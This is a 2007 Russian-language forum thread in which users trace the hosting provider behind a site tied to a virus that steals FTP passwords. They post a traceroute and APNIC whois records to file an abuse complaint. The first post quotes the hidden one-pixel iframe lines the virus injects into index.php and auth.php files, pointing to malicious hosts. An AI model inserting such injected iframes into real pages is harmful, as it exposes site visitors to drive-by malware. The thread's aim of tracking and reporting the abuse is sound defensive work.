Есть сайт alltraff.ru, который участвует в работе одного вируса. Суть вируса: распространяется по сети, тырит пароли от фтп, если находит на фтп index.php или auth.php, то добавляет в конец строку:
<iframe src='http://alltraff.ru/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe>
В ней происходит запрос к файлу alltraff.ru/iframe.php, который возвращает:
<iframe src='http://google-counter.com/in.cgi?5' width='1' height='1' style='visibility: hidden;'></iframe>
ДНСники у сайта ns1.lexhost.info и ns2.lexhost.info, т.е. сервер чувак арендует. Как узнать кто ему доступ в инет предоставляет, чтобы обрубить нахрен всю эту потеху?
[Ответ]
Vital_N 15:11 15.08.2007
не сделаешь ничего ты им
они походу далеко в азии где-то сидят
8 so-5-2-0-dcr1.amd.cw.net (208.173.211.237) 83.950 ms 81.134 ms 78.152 ms
9 as0-dcr2.amd.cw.net (195.2.10.154) 86.154 ms 81.073 ms 78.372 ms
10 so-4-0-0-dcr1.tsd.cw.net (195.2.10.146) 86.353 ms so-3-0-0-dcr1.tsd.cw.net (195.2.10.105) 83.708 ms 89.852 ms
11 so-4-0-0-bcr1.tsd.cw.net (195.2.10.57) 84.687 ms so-3-0-0-bcr1.tsd.cw.net (195.2.10.53) 85.674 ms so-4-0-0-bcr1.tsd.cw.net (195.2.10.57) 80.460 ms
12 ge-6-0-6.lon22.ip.tiscali.net (166.63.211.154) 84.671 ms 76.989 ms 86.362 ms
13 so-0-0-0.lax22.ip.tiscali.net (213.200.80.93) 217.511 ms 219.336 ms 218.306 ms
14 asia-netcom-gw.ip.tiscali.net (213.200.84.250) 225.545 ms 223.834 ms 229.439 ms
15 po0-0.cr2.nrt1.asianetcom.net (202.147.61.134) 339.036 ms 336.450 ms 342.775 ms
16 po5-2.cr1.hkg3.asianetcom.net (202.147.0.170) 390.969 ms 392.111 ms 394.598 ms
17 po15-0.gw2.hkg3.asianetcom.net (202.147.16.210) 390.452 ms 413.875 ms 391.750 ms
18 HFI-0002.gw2.hkg3.asianetcom.net (202.147.17.90) 520.431 ms 395.794 ms 400.798 ms
19 116.50.12.18 (116.50.12.18) 397.473 ms 402.452 ms 398.817 ms
20 116.50.12.14 (116.50.12.14) 399.987 ms 441.708 ms 396.679 ms
21 58.65.235.105 (58.65.235.105) 400.936 ms 396.451 ms 398.801 ms
[Ответ]
Breathe 15:15 15.08.2007
Кароче блин в Гон-Конге сервак у них стоит
inetnum: 58.65.232.0 - 58.65.239.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
D PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: [email protected]
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object,
APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: [email protected] 20060612
changed: [email protected] 20060613
changed: [email protected] 20061018
source: APNIC
person: Piu Lo
mail: [email protected]
address: Unit 2001, 20/F, New Tech Plaza,
address: 34 Tai Yau Street, San Po Kong, KLN
address: Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: [email protected] 20070710
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC
Breathe, они на тебя положат 99% )
все уроды , которые че нить в россии творят или продают кал всякий
хостятся за бугром - потому что ничего им никто не сделает никогда
я как-то пробовал вяским провам забугорным писать на спамеров жаловаться- ни ответа ни привета
так что это все без толку имхо
но попробовать конечно можно )
[Ответ]
Breathe 15:23 15.08.2007
Vital_N, регистратор alltraff.ru НАУНЕТ, сейчас веду переписку с ними. Может они что предпримут.
[Ответ]
Vital_N 15:25 15.08.2007
Breathe, ну максимум, домена лишить можно наверное
сменят домен на .com или .ebu какой-нить - суть то останется (
[Ответ]
Breathe 15:33 15.08.2007
А если хостинга лишат, то тоже ничего страшного. Перейдут к другому фигли.